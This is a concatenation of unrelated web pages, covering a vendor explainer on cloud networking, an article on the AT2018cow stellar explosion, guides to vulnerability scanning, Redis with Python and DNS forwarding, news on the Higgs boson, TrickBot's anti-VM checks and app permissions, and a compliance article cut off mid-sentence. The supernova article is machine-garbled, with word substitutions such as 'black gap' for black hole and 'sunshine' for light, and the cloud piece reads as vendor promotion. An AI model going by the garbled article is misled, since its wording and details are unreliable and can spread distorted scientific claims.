What is cloud networking? An overview on the technology and it’s challenges Learning Center | Cloud Networking | Cloud Networking After reading this article you will be able to: - Understand what cloud networking is - Understand how cloud networking is different that data center networking - Differentiate connecting to the cloud and networking in the cloud - Learn to avoid cloud networking myths and misconceptions CLOUD NETWORKING ARTICLES What is cloud networking? What is a Hybrid Cloud Network? What is Terraform and Infrastructure as Code? What is AWS VPC Peering? What is Transitive Routing? Azure Networking Fundamentals Microsoft Azure VNet Features Azure Virtual Private Network (VPN) How do I configure Azure VNet to VNet Handling overlapping IPs Networking has evolved for the Cloud Era. As enterprise computing transforms from data center centric architectures to cloud centric architectures (using AWS, Azure, Google and Oracle) , the underlying networking platform has evolved from a 1990s hardware centric, client-server/Internet network design to a fully software-centric cloud networking design for the cloud era. This article explains what cloud networking is, how it is different than traditional data center networking, and why forward-thinking enterprise network, security and cloud architects view cloud networking technology and operational practices as the future of enterprise networking. What is cloud networking? Networking, as it has always been, is the communications infrastructure that allows users and applications built on distributed compute platforms to interact. Cloud networking is networking that has been specifically developed to operate in public clouds, embracing the simplicity and agility of cloud infrastructure, while delivering the operations and security enterprises require. A core part of cloud networking is intelligent cloud routing. While native cloud constructs allow network engineers to manually update route tables, this because a major challenge for dynamic, enterprise scale deployments that need to fully automated processes. Modern cloud networking solutions offer centralized intelligence and control over routing in the cloud network, replacing manual processes and allowing multi-cloud network automation and advanced traffic engineering. A cloud network platform leverages and controls underlying native public cloud networking constructs, while adding advanced networking, security and operational capabilities not offered by the underlying clouds to create a superset network abstraction that simplifies and enhances networking consistently within and across disparate public clouds. How is cloud networking different than traditional data center networking? Traditional, data center network architectures are optimized and scaled based on fixed, physical, on-premises designs, built and managed with a legacy, box-by-box operational model. These legacy network solutions reinforce a data center centric approach, desperately trying to maintain the physical data center architecture their businesses depend on, while the center of gravity is rapidly shifting to public clouds. Traditional networking is “cloud naïve”, effectively deploying a virtual version of hardware on a cloud compute platform which is completely unaware that it is even in a cloud. Traditional network architectures and operational models will prove untenable, as enterprises migrate into public clouds and develop an inevitable multi-cloud network strategy. Conversely, cloud networking is purposely designed to be “cloud native” and fully embraces the shift to public cloud and the distributed nature of cloud-based applications. Cloud networking is built into cloud platforms, it’s on-demand, highly available, resilient, intelligent and secure. Cloud networking is specifically designed to deliver cloud simplicity, scale and elasticity through infrastructure as code automation and multi-cloud operational visibility that facilitates fast troubleshooting and resolution of network issues that can impact application availability. Key Benefits of Cloud Networking: - Simple to Procure and Deploy - Operational Efficiency - Consistent Security - Multi-Cloud Network Readiness Who should care about Cloud Networking? Cloud Architects and Operations Teams – While your focus is often on applications, a well architected cloud network architecture will make your life much simpler. Be wary of data center architecture extensions positioned as cloud networking and understand that there are networking limitations and challenges Cloud providers will avoid bringing up and which are not obvious in small or single cloud designs. Network Architects, Engineers and Operations Teams – A DIY approach can work, but it’s likely to be difficult and costly to build, maintain, and modify. Take the time to understand what a modern cloud networking platform can offer. Security Architects, SecOps and Corporate Compliance Teams – Centralized, consistent security policies, enforcement and auditing across a single or multiple cloud network significantly reduces risk. Take the time to understand how cloud networking and security has evolved for the cloud. DevOps Teams – Infrastructure as code automation is critical for DevOps teams to achieve the speed and agility applications teams need from their networking and security counterparts. Cloud networking offers a radical departure from traditional networking and security operational models and allows seamless integration into enterprise DevOps CI/CD pipelines. Myths and Misconceptions of Cloud Networking Multi-Cloud Networking – Connecting to the Cloud versus Cloud Networking As enterprises leverage multiple public clouds driven by customer requirements, acquisitions or simply because some business-critical applications operate better in one cloud versus the other, cloud networking is multi-cloud networking, it is important to recognize the difference between networking to clouds and cloud networking. Many datacenter-centric technologies and services are designed to connect branch offices to datacenters or datacenters to other datacenters. Examples include SD-WAN, private connectivity providers such as Equinix and Megaport or SASE offerings such as Palo Alto Networks and Zscaler market their solutions as “multi-cloud” or cloud networking, meaning they connect to multiple clouds but stop at each cloud’s edge. True cloud networking is software-based networking, security and operational services, which operate within multiple regions of a single cloud; from on-prem datacenters, branch offices, and remote users to the cloud; and between multiple public clouds. Cloud networking delivers a consistent and repeatable network and security architecture and offers enterprise-class operational visibility in the cloud, while also supporting connections to enterprise investments in traditional data center technologies, such as SD-WAN. Native Cloud Constructs Don’t exactly do Everything You Need Cloud service providers will tell you that they provide everything and anything you need for networking in the cloud. Simply not true. There are significant limitations and challenges around routing, traffic engineering, operational visibility, control and multi-cloud consistency you need to be aware of. Evaluate a cloud network platform that leverages and controls native cloud networking constructs, but adds a superset of advanced services, operational visibility and control, even in a single cloud, and provides a multi-cloud network architecture allowing your team to be multi-cloud ready. Data Center to the Cloud or Cloud to the Data Center As the center of gravity for enterprise applications shifts from data center to the cloud, architecture and operational models must change. Traditional vendors will position extensions of data center technologies and operating models as the best approach for the cloud or a transition to the cloud. Forward thinking cloud and network architects recognize that their company’s future is heavily weighted to applications and data being in the cloud, on cloud networking, rather than in on-premises data centers, on data center networks. Expect a dramatic shift in perspective as cloud services, such as Amazon Outposts, expand from the cloud back to the data center, where needed, and bring the cloud operational models on-premises, rather than the other direction.
<urn:uuid:d37915c7-7231-49fc-8f07-1d9c47dc5985>
CC-MAIN-2022-40
https://aviatrix.com/learn-center/cloud-networking/what-is-cloud-networking/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00133.warc.gz
en
0.915826
1,532
2.53125
3
A mysterious stellar explosion has given scientists a window into the supply of sure large, short-lived supernovae. The explosion in query, procedurally named AT2018cow–and lovingly known as “the Cow”–flashed like a supernova in June of 2018. But it surely lasted a lot shorter than regular supernovae, and it emitted totally different coloured mild, making it what astronomers name a “quick blue optical transient.” Such occasions are fleeting and consequently simple to overlook. The place a typical supernova develops for a month or two and fades over just a few extra months, these objects “go up in lower than every week” and “disappear in lower than a month,”says Dheeraj Pasham, an astrophysicist at MIT and lead of a new study on the Cow printed within the journal Nature Astronomy this week. These swift explosions are tough to catch with most astronomical surveys, which can solely re-scan the identical space of the night time sky as soon as a month—too gradual to catch an occasion that lasts just a few weeks. However latest advances in telescope expertise have allowed for a lot quicker scans—typically even catching a number of views of the identical patch of sky per night time, he says. Fortunately, the Cow was “recognized on the proper time,” Pasham says. Astronomers realized it was there simply days after it appeared. All over the world, researchers skilled all types of fancy telescopes on it, analyzing it throughout optical, ultraviolet, x-ray, radio, and different frequencies of sunshine. At 100 instances brighter than a typical stellar explosion, the Cow is among the brightest of those unusual supernovae. In a mean supernova, a star runs out of gas, collapses in on itself, and bursts in an enormous explosion. The Cow and the few blasts prefer it are so excessive that scientists can’t clarify them by way of these mechanisms alone. “There have to be some further supply of vitality” to bridge the large distinction in brightness between these and commonplace supernovae, Pasham says. As for the place this additional enhance comes from, there are a plethora of concepts. One risk, which isn’t far off from an ordinary supernova, is that the core of the star collapsed and shaped a rotating neutron star with a powerful magnetic subject, known as a magnetar. The speedy spin of this magnetar may have transferred vitality to the large blast astronomers noticed. Equally, the core of the star may have shaped a black gap, inflicting the outer layers of the star to fall into it, which additionally would emit lots of vitality, doubtlessly explaining the bigger increase. Different hypotheses have been floated up to now, too, comparable to a collision between two white dwarfs or a black gap ripping aside one white dwarf with its overwhelming gravity. However Pasham’s workforce appears to have dominated out causes that don’t contain a neutron star or black gap, says Cosimo Inserra, an astrophysicist who research supernovae at Cardiff College within the UK and was not concerned with the research. “There’s nonetheless no smoking gun” that reveals what occurred, Inserra says, however the research of the x-ray sign was “extraordinarily thorough” and dominated out many attainable explanations. At current, each attainable clarification for the Cow appears to have some challenge with it, he says. For the neutron star clarification, he says the x-ray sign ought to have slowed down over the course of 60 days, however didn’t. A black gap is likely to be that secure, however has by no means been noticed to behave like this earlier than, he says. The vitality of a compact object, which means a black gap or neutron star, plus one other unknown issue could have resulted within the explosion, Inserra says. As an example, the star may have been surrounded by a shroud of matter. As soon as the star exploded, its remnants would have ploughed by way of the cloud, producing an even bigger flash. Or the exploding star may have been in orbit with one other object, including to the bang. Pasham and his colleagues say they’re satisfied a black gap or neutron star was concerned, primarily based on their x-ray measurements from the explosion utilizing NASA’s Neutron star Interior Composition Explorer (NICER), an instrument on the Worldwide House Station. Presently, Pasham notes, no different software acquires knowledge fast sufficient to seize this sort of x-ray sign. This research, paired with a number of prior ones, has offered the “nail-in-the-coffin proof that it’s certainly, a compact object,” Pasham says. The brightness of the Cow’s x-rays modified over time—brightening and dimming—in a cycle that lasted 4.4 milliseconds lengthy. To Pasham, this seems to be like an indication that matter is intently orbiting a “new child” black gap or a sort of neutron star known as a magnetar, and the matter shines with x-rays every time it completes a fast orbit. Presently, the analysis workforce can’t inform whether or not a black gap or magnetar precipitated the cycle they noticed. Doing so would require a “big quantity of computation energy,” Pasham says, which the workforce is now in search of. With so many future sky surveys within the works, Pasham is assured astronomers will detect many extra of those objects. “This,” he says, “is just the start.”
<urn:uuid:3e8a1394-3f4f-43d5-9edf-9be285e9f98e>
CC-MAIN-2022-40
https://dimkts.com/astronomers-may-have-an-origin-story-for-the-cow-a-mysteriously-powerful-cosmic-blast/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00133.warc.gz
en
0.953932
1,200
2.75
3
What Is Vulnerability Scanning? Vulnerability scanning is the process of scanning computing resources to identify exploitable vulnerabilities, usually using automated tools. When new vulnerabilities are discovered, the security research community publishes signatures for those vulnerabilities. Vulnerability scanners use a list of signatures to test networks, applications, and infrastructure, identify known vulnerabilities, and assist with their remediation. This is part of our series of articles about vulnerability management. In this article: Why Are Vulnerability Scans Important? Vulnerabilities are an open door to exploitation by attackers. The main goal of vulnerability scans is to prevent cyberattacks, or reduce their impact, by identifying and remediating critical vulnerabilities. In addition, vulnerability scans can help organizations become more proactive in their security efforts. Vulnerabilities often exist in a system before they cause noticeable damage. Scanning helps teams find threats and take action before serious damage occurs. Vulnerability scans also help developers and security teams prioritize risk—helping identify the issues requiring immediate action. The Vulnerability Scanning Process Here are the steps involved in vulnerability scanning. The first step in the vulnerability management process is to discover and classify an organization’s assets. These include: - Source code - Bare metal servers and Virtual Machines (VMs) - Web applications - Cloud endpoints and hosts - Container images - Serverless applications Asset discovery can be challenging in any environment. In a cloud native environment it is even more complex, because of the dynamic and ephemeral nature of computing resources. A common strategy for discovering cloud native assets is service discovery. Next, organizations should group assets to facilitate targeted vulnerability scans. They should base the asset classes on criteria like: - Externally exposed assets - Assets only accessed by internal components - Resources storing confidential data or serving mission critical functions The next step involves identifying and assessing vulnerabilities within the protected environment. This process includes: - An initial sweep of the environment to find live systems and verify their accessibility for the scans. - Version fingerprinting to collect system data. - Correlating data and comparing it to known vulnerability lists. Properly configured vulnerability scanners are essential to provide accurate results, reduce false positives, and avoid scanning issues. Vulnerability assessments require careful planning to ensure accuracy and consistency. Triage and Analysis After identifying vulnerabilities, it is important to contextualize the vulnerability data. Scoring criteria like CVSS help organizations prioritize risks and mitigate the most critical vulnerabilities. The vulnerability triaging process should include the following: - Distinguishing real vulnerabilities from false positives. - Determining if vulnerabilities are exploitable via the Internet. - Identifying published exploits. - Assessing the likelihood and potential impact of a breach. - Identifying the security controls to mitigate attacks. Vulnerability scanners often generate false positives due to misconfiguration. A human security team can help identify false positives and prioritize high-risk vulnerabilities. After confirming the risk level of vulnerabilities, the team must remediate them using various tools and techniques. There are several approaches to handling vulnerabilities: - Elimination—applying patches or fixing the code. - Mitigation—reducing the impact and likelihood of an exploit. - Acceptance—acknowledging the risk and choosing not to fix the vulnerability. Not all vulnerabilities require elimination or mitigation—other security controls might provide an adequate solution. Scanning tools offer remediation capabilities but are usually insufficient and should accompany manual investigation and remediation processes. The final step is to validate the fixes applied to vulnerabilities to ensure they function as intended. It is a continuous process to inform the overall vulnerability management strategy. Related content: Read our guide to vulnerability scanning process Traditional Vulnerability Scanners Network Vulnerability Scanners A network vulnerability scanner covers all systems throughout the network, sending probes to identify open ports and services, then further examining each service for details. It can discover configuration issues and known vulnerabilities. How it works may vary—organizations can install hardware devices within the network or deploy virtual devices on virtual machines to scan all other devices in the network. Keeping devices up-to-date in line with network changes can quickly get complicated. When the network becomes more complex, the number of vulnerability scanners required to process every network segment increases. Web Application Vulnerability Scanners Publicly accessible web applications require regular vulnerability scans to prevent attacks. Cybercriminals often exploit web application vulnerabilities such as cross-site scripting (XSS) to inject malicious code into applications and modify trusted data, relying on the unsuspecting user to execute the malicious script. Web application scanners are useful for verifying the implementation of input validation within a comprehensive web app security program. Security teams should continuously scan for Secure Sockets Layer (SSL) configurations and review the results to stay up-to-date. It is a best practice to shift security left by running static application security testing (SAST) at early development stages. This can identify web application vulnerabilities while code is being developed, and help developers fix it long before it is deployed to production. Host-Based Vulnerability Scanners A host-based vulnerability scanner identifies vulnerabilities by evaluating the operating systems and configurations of local network hosts such as servers. There are three main types of host-based vulnerability scans: - Agent-server scan—software agents installed on endpoints perform vulnerability scans and report data to the central server for further analysis. Agents typically collect real-time data and send it back to a management system. One of the problems with agent-server scans is that each agent is linked to an operating system. - Agentless scan—this method involves initiating scans from a central command center or based on automated schedules. It requires using administrator credentials to access network systems. Agentless scans have different operating system requirements from agent-based scans, meaning they can cover more resources. However, the evaluation requires a consistent network connection and may be less thorough than agents. - Standalone scan—this method does not require network connections and is the most labor-intensive host-based vulnerability scanning approach. Each host must have a scanner installed. A standalone approach may not be feasible for most organizations managing hundreds or thousands of endpoints. After each scan, the security team must collect, compile, analyze, and report on data from every host. This data then informs mitigation procedures. Related content: Read our guides to: - Vulnerability management tools - Vulnerability scanners (coming soon) Modern Vulnerability Scanners Supporting Shift-Left Security Source Code Scanners Source code is the basis of operating systems and applications. The Open Web Application Security Project (OWASP) ranked insecure designs as #4 in its top 10 vulnerabilities list for 2021. A source code scanning tool can compare code to NIST’s National Vulnerability Database. This database lists common known vulnerabilities and exposures affecting open source code. Cloud Vulnerability Scanners Cloud computing offers many benefits to organizations of any size, including the scalability of SaaS, PaaS, and IaaS implementations. Virtual access controls are necessary to protect cloud infrastructure like the access control devices that physically secure a data center. Implementing cloud security is critical to modern enterprises. Therefore, vulnerability management programs should include cloud service discovery and vulnerability scanning tools, as well as misconfiguration detection, as early as possible. Container Vulnerability Scanners Containerized applications are becoming increasingly popular, but they can pose a security risk if not handled properly. A major security risk with containers relates to container images—the templates used to build new containers. Container images often contain bugs and security vulnerabilities, passing on these vulnerabilities to all containers built from them. Vulnerability scanning of container-based applications prevents security flaws and bugs vulnerabilities from reaching the production environment. It allows developers to avoid using vulnerable images to create production containers. A container vulnerability scanner continuously scans and audits containers and images, making it an integral part of the DevSecOps process. Related content: Read our guide to container vulnerability scanning (coming soon) Vulnerability Scanning Best Practices The following best practices help ensure an effective vulnerability management strategy. Run Vulnerability Scans Frequently Every organization should have a vulnerability management program tailored to its DevOps environment. The vulnerability management process should be accurate, continuous, and fast. Powerful vulnerability scanners are the best way to achieve this, providing the following benefits with frequent scanning: - Accurate reporting—machine learning-based vulnerability scanners can improve over time, increasing the accuracy of scans. They reduce the number of false positives and increase reporting accuracy, generating reports quickly. - Automated scanning—vulnerability scanners can automatically run checks for every code change. Each new application version can introduce potential vulnerabilities, so running automated scans for all updates is essential. - Compliance—security audits are mandatory in many industries, and vulnerability reporting is an important part of these activities. Therefore, regular vulnerability scanning is essential for maintaining regulatory compliance. Staying ahead of security threats also builds trust and reassures customers regarding potential security threats. Implement Scans Early in the SDLC Scanning shouldn’t wait until the deployment phases; packages should undergo scans immediately when built. Scanning as soon as possible has two advantages. First, addressing vulnerabilities early in the development pipeline is easier because the team hasn’t invested as much in the code. Suppose the security team waits until developers have run other types of tests on the package before scanning for vulnerabilities. In that case, they’d have to rebuild the software and re-run the tests if a vulnerability is detected. Second, scanning earlier helps minimize the risk of releasing insecure applications to production. No one should push an unscanned container image to the registry where users can download and install it. The early scans don’t replace pre-deployment scans; evaluating the software’s risks is important before pushing it to production. However, detecting vulnerabilities early in the development cycle helps reduce the burden later in the pipeline. Keep Packages Small The more dependencies and overall code the packages contain, the harder it will be for the vulnerability scanner to process every layer and find vulnerabilities. Fixing security issues and rebuilding packages can also be difficult if the packages contain too many objects. A package should only contain the code and resources needed to deploy a specific aspect of an application feature. Developers should avoid packaging multiple application components into the same package. For example, developers can create different Docker images for each microservice. It is better than building a single image with multiple microservices. Alternatively, they can separate the application logic from the front end, using two Debian packages instead of one. Long lists of vulnerabilities in each package are unhelpful if the team tries distinguishing the more serious vulnerabilities from the less critical ones. Organizations can avoid this problem by using a scanner that allows them to assess vulnerability risks and prioritize according to each vulnerability’s likely impact. Prioritization helps teams utilize their time better, ignoring less important vulnerabilities while focusing on serious issues. Expand Detection Coverage Integrating security tests and scans into the CI/CD pipeline helps prevent exploits and disruptions by allowing teams to patch vulnerabilities quickly. Security teams should check many types of vulnerabilities, not just scan code. In addition to the code, they should consider the cloud and container infrastructure used to scan for vulnerabilities. Cloud service providers usually implement security best practices, but organizations should ensure they have full vulnerability detection coverage.
<urn:uuid:04d768fa-118f-4a35-87fe-c2d03b7dda49>
CC-MAIN-2022-40
https://www.aquasec.com/cloud-native-academy/vulnerability-management/vulnerability-scanning/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00133.warc.gz
en
0.894683
2,368
3.203125
3
Although the data is stored in the system’s memory, you can add persistence by dumping the stored data to disk and loading it when needed. In this guide, we will introduce you to key concepts in Redis and show you how to use Redis with the Python programming language. The first step is to set up the development tools. In this guide, we will be using a Debian 11 Linux system. Open the terminal and add the official Redis repositories as: sudo apt-get update sudo apt-get install curl gnupg -y curl https://packages.redis.io/gpg | sudo apt-key add – echo “deb https://packages.redis.io/deb $(lsb_release -cs) main” | sudo tee /etc/apt/sources.list.d/redis.list sudo apt-get update sudo apt-get install redis -y Once you have Redis installed, start the server using the command. You can also use systemctl to start the Redis server using the command as shown below: sudo service redis-server start Before diving into using Python to work with a Redis database, let us first recap how to use Redis using the command-line interface. Connecting to the cluster. Once the Redis server is running, open a new terminal session and enter the Redis command-line client as: Once you run the redis-cli command, you should get a prompt showing an IP address and the port to the Redis server. Redis does not work like a typical Relational database. However, it does contain a concept of databases which are isolated collections of key-value pairs. Unlike a database in relational databases, in Redis, a database does not have schemas, tables, or rows. In Redis, we use index values such as 0 to access the first database. Redis does not provide custom naming such as sample_database as provided in traditional databases. To select a specific database, use the SELECT command followed by the database’s index to access it. For example, to select database 10. 127.0.0.1:6379> SELECT 9 Note: Database indexes in Redis start from 0 to 15. If you try to access an index above 16, you will get out of range error. 127.0.0.1:6379> SELECT 16 (error) ERR DB index is out of range As we mentioned, Redis uses key-value notation to store the data. You can add new data using the SET command and the key and values separated by a space. If the Redis command executes successfully, you should see an [OK]. It is good to ensure you provide both the key and value in the SET command. Otherwise, you will get a wrong number of arguments error as shown: 127.0.0.1:6379> SET novalue (error) ERR wrong number of arguments for ‘set’ command You can fetch values stored in the Redis server using the GET command and the key name. For example, to get the value of the key “name” we can do: Ensure the specified key exists on the server. If you specify a non-existent key, you will get a nil result as: In Redis, you can delete a key and its related data by using the DEL command and the key’s name. Using Python to Work with Redis Although you can create your library to work with Redis, a common practice is to use already available tools to perform such tasks. You can browse the Redis clients catalog to search for an appropriate library. In this example, we will use redis-py as it is actively maintained and easy to install and use. Installing Python 3 Before proceeding further, ensure you have Python installed on your system. Open the terminal and enter the command: -bash: Python: command not found If you get a “command not found” error, you need to install Python. Use the commands: sudo apt update sudo apt install python3.9 The above commands will update the software repositories and install Python version 3.9. Once completed, ensure you have the correct Python version. To install the redis-py package, we need to ensure we have pip installed. Open the terminal and enter the command: sudo apt-get install python3-pip Once you have pip3 installed, enter the command below to install the redis-py package. Using Redis-Py package. To illustrate how to work with Redis using the Python package, we will replicate the operations in the Redis basics section. Let us start by connecting to Redis. Create a Python file and add the code shown below to connect to the Redis cluster. # create connection to the redis cluster r = redis.Redis(host=‘localhost’, port=6379) Once we have a connection to the server, we can start performing operations. NOTE: The file will connect to a database at index 0. You can specify your target index by setting the db parameter as: r = redis.Redis(host=‘localhost’, port=6379, db=10) The above example will connect to the database at index 10. To create a key-value pair using the Python package, you can do: r.set(“name”, “John Doe”) The line above will take the first arguments as key and value, respectively. To fetch the values, use the get function as: The above query will return the value in the specified key as an encoded value: You can use the decode function to decode the value. To delete a key and its corresponding data, use the delete function as shown: If you get the value stored in a deleted key, Python will return a None value. In this article, we dive deep into working with the Redis database. Redis is powerful and can be essential in high-performance environments. Check the documentation to learn how to work with Redis and Redis-Py package.
<urn:uuid:a29af3e1-ceee-49f9-8a7a-aca9939243f0>
CC-MAIN-2022-40
http://dztechno.com/query-redis-from-python/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00133.warc.gz
en
0.744078
1,436
2.765625
3
There’s occasionally some confusion between DNS forwarding and HTTP redirection or the use of CNAME records to designate DNS aliases. DNS forwarding exclusively refers to the process where specific DNS requests are forwarded to a designated DNS server for resolution. It is not the solution for redirecting one domain to another, for which you would use an HTTP redirect. Nor is it useful for aliasing a subdomain to another domain: that’s the job of CNAME (Canonical Name) records. What is DNS Forwarding? DNS forwarding is the process by which particular sets of DNS queries are handled by a designated server, rather than being handled by the initial server contacted by the client. Usually, all DNS servers that handle address resolution within the network are configured to forward requests for addresses that are outside the network to a dedicated forwarder. When deciding how to allocate DNS resources on a network it’s important to implement some separation between external and internal Domain Name Services. Having all DNS servers configured to handle both external and internal resolution can impact the performance and security of a network. The terminology around DNS forwarding can be a bit confusing because the forwarder has DNS queries forwarded to it by DNS servers that aren’t forwarders — try saying that five times quickly! The DNS forwarder should be thought of as the designated server to which a particular subset of queries (either for external addresses or specific internal addresses) are forwarded by other DNS servers within the network. It then sends (forwards) those requests for resolution to other DNS servers. Why Use DNS Forwarding For External Addresses? If no DNS server is designated as the forwarder to which external queries are routed, then all DNS servers within the network will handle external requests, which means that they will query external resolvers. This is undesirable for two main reasons: Internal DNS information can be exposed on the open Internet. It’s far better to have a strict separation between internal and external DNS. Exposing internal domains on the open Internet creates a potential security and privacy vulnerability. Without forwarding, all DNS servers will query external DNS resolvers if they don’t have the required addresses cached. This can result in excessive network traffic. By designating a DNS server as a forwarder, that server is responsible for all external DNS resolution and can build up a cache of external addresses, reducing the need to query recursive resolvers and cutting down on traffic. For smaller companies with limited available bandwidth, DNS forwarding can increase the efficiency of the network by both reducing bandwidth usage and improving the speed at which DNS requests are fulfilled. DNS Forwarding For Internal Addresses It’s also often useful to have a subset of internal addresses handled through DNS forwarding. For larger intranets with multiple domains and subdomains, it may be more efficient to have DNS requests for a subset of those domains handled by a dedicated server to which requests are forwarded with conditional DNS forwarding. Also published on Medium.
<urn:uuid:0dd5d93f-7d3d-4b30-9515-c77969a82622>
CC-MAIN-2022-40
https://social.dnsmadeeasy.com/blog/understanding-dns-forwarding/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00133.warc.gz
en
0.93829
623
3.53125
4
Scientists are getting very close to proving or disproving the existence of the subatomic particle known as the “Higgs boson.” The list of possible hiding spots for the Higgs boson particle has been narrowed down, according to teams carrying out experiments at CERN’s Large Hadron Collider in Geneva Switzerland. The existence of Higgs boson — also know as the “God particle” — is key to explaining why there is mass in the universe. It will likely be another year before scientists have enough data to say whether the elusive particle really exists. The particle would weigh in at about 125 billion electron volts — about 125 times heavier than a proton and 500,000 times heavier than an electron, according to physicists working on the ATLAS experiment at LHC. They have seen “tantalizing hints” in the mass region, but “we cannot conclude anything at this stage,” said Fabiola Giamnotti, an ATLAS spokesperson. “Given the outstanding performance of the LHC this year,” Giamnotti said, there should be enough data to revolve the puzzle in 2012. Scientists working on the CMS experiment at LHC also made some intriguing observations, excluding the existence of the SM Higgs boson in a wide range of possible Higgs boson masses, and expect data collected in 2012 to illuminate their findings. A Big, Big Step For those who follow LHC developments, there are not enough superlatives to capture the importance of Tuesday’s announcement and the subsequent proof or non-proof of the Higgs boson particle expected in 2012. “Consider this the biggest question of our time. Higgs boson is believed to be the fundamental building block for the universe, and it is undiscovered,” Rob Enderle, principal analyst at the Enderle Group, told TechNewsWorld. “Proving it exists and how it works goes to the core of why there is a Large Hadron Collider in the first place.” The discovery of Higgs boson may be the key to understanding how to build matter from energy, Enderle noted. Its confirmation would be “up there with the discovery of gravity and DNA,” he said. “It is likely even more important, since understanding this particle could change forever how we view reality.” ‘No Higgs Boson’ Would Be Big News The fact that it may not even exist “in and of itself would be interesting,” said Enderle, “because that would mean some core calculations we use to explain how the universe works are faulty.” If it does exist, the Higgs boson is likely a very large little particle. It would qualify as “a massive elementary subatomic particle,” Charles King, principal analyst at Pund-IT, told TechNewsWorld. “It will also reinforce the Standard Model of modern particle physics, including the existence and creation of mass.” The development and construction of CERN’s Large Hadron Collider underlines the importance of this point, he noted. “LHC’s funding was largely predicated on searching for and finding elemental particles including the HB.” The biggest surprise might be that the Higgs boson particle doesn’t exist. The impact of confirmed nonexistence could be as great as discovering the particle. “That point is obviously central to so-called ‘Higgs-less models’ which depend on other mechanisms for mass generation,” said King. The Higgs boson quest is just one of the missions of the LHC. In another fascinating area of research, investigators reported indications of subatomic particles traveling faster than the speed of light. If proven, “that would contradict Einstein’s theory of special relativity,” said King.
<urn:uuid:b5136bb9-ee48-4bad-a719-19ce9012de06>
CC-MAIN-2022-40
https://www.ecommercetimes.com/story/higgs-boson-may-be-running-out-of-hiding-places-73963.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00133.warc.gz
en
0.939356
815
2.53125
3
The infamous TrickBot trojan has started to check the screen resolutions of victims to detect whether the malware is running in a virtual machine. When researchers analyze malware, they typically do it in a virtual machine that is configured with various analysis tools. Due to this, malware commonly uses anti-VM techniques to detect whether the malware is running in a virtual machine. If it is, it is most likely being analyzed by a researcher or an automated sandbox system. These anti-VM techniques include looking for particular processes, Windows services, or machine names, and even checking network card MAC addresses or CPU features.
<urn:uuid:97b078d1-1fb8-426f-9a27-fe95fbaee180>
CC-MAIN-2022-40
https://informationsecuritybuzz.com/expert-comments/trickbot-malware-now-checks-screen-resolution-to-evade-analysis-expert-reaction/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00133.warc.gz
en
0.893348
119
2.875
3
Kaspersky Lab’s “Are you cyber savvy?” Quiz, which questioned more than 18,000 consumers about their online habits, found that an alarming number of consumers are leaving their privacy – and the data on their phones – exposed to cyber-threats because they are not installing apps on their devices safely. When users neglect to read license agreements or messages during the app install process, they do not know what they are agreeing to. Some apps can affect user privacy, prompt the installation of other apps, or even change the OS settings of a device completely legally, because the user has ‘agreed’ to it during the installation process. The quiz also discovered that just under half (43 per cent) of users could be at risk from the apps on their mobile device because they are not ‘cyber-savvy’ enough to limit app permissions when installing apps. 15 per cent of quiz respondents do not limit what their apps can do on their phone at all and 17 per cent give apps permissions when prompted, but then forget about it, while eleven per cent think they can’t change those permissions. When app permissions are left unchecked, it is possible – and legal – for apps to access the personal and private data on mobile devices, from contact information, to photos and location data. Commenting on the findings, David Emm, Principal Security Researcher at Kaspersky Lab says, “Internet users are entrusting their devices with sensitive information about themselves and others, such as contacts, private messaging etc., yet they are failing to ensure their information is entirely safe. This can turn their devices into their ‘digital frenemies’. Because they are not taking precautions when they install apps, many consumers are granting apps permission to intrude on their private lives, watch what is stored on their devices and where they are, install additional unwanted apps and make changes to their devices right from the moment of installation. At Kaspersky Lab, we want to help consumers become more cyber-savvy and protect their precious data – and themselves – from these dangers.” To protect themselves consumers should: – Only download apps from trusted sources; – Select the apps you wish to install on your device wisely; – Read the license agreement carefully during the installation process; – Read the list of permissions an app is requesting carefully. Do not simply click ‘next’ during installation, without checking what you are agreeing to; – Use a cybersecurity solution that will protect your device from cyber-threats. [su_box title=”About Kaspersky Lab” style=”noise” box_color=”#336588″][short_info id=”59584″ desc=”true” all=”false”][/su_box]
<urn:uuid:0b7c3164-494c-410e-acf0-272dcc5d4801>
CC-MAIN-2022-40
https://informationsecuritybuzz.com/study-research/onefive-could-be-signing-away-their-privacy-when-they-install-a-new-application/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00133.warc.gz
en
0.936843
591
2.578125
3
Compliance regulations provide organizations with acceptable standards for developing strong cybersecurity programs. Compliance is an important tenet underlying the development and maintenance of information security programs. Different regulations have emerged over the years to address increasing security challenges. Today, cyber actors are relentless in innovating new security risks, malware, trojans, and programs for compromising organizational security. Also, emerging technologies have always brought along unprecedented security risks. For example, the use of virtual currencies like Bitcoins, Monero, Ethereum, etc., have caused crypto-jacking attacks to rise, edging out attacks like ransomware attacks, which have been dominant for years. It is, therefore, vital for organizations to understand the current and the future of cybersecurity and how they can best protect themselves from emerging threats. A primary response has been the establishment of international and local regulatory bodies to develop security standards to enable companies to harden their security postures. A common feature of compliance is that regulations, standards, policies, and legislations are directly influenced by evolving cybersecurity environments. Many organizations thus find it a challenge to maintain acceptable compliance postures. Current Compliance Regulations Compliance regulations provide organizations with directives for safeguarding their data and IT systems, and for addressing existing privacy and security concerns. Also, compliance regulations ensure that companies fulfill their obligations to prevent accidental breaches and attacks caused by negligence or the implementation of insufficient security programs. Most regulations compel organizations to secure their systems through implementing a variety of basic security measures such as firewalls, adequate risk assessments, data encryption technologies, and training employees on secure use and handling of sensitive information. Whereas some regulations are voluntary, others are mandatory. Consequently, organizations should demonstrate they not only understand them, but they also implement and maintain them accordingly. They should, at any time, produce evidence they are compliant. Benefits of Compliance Regulations - Business opportunities: compliance regulations are meant to enable companies to secure their systems and observe best 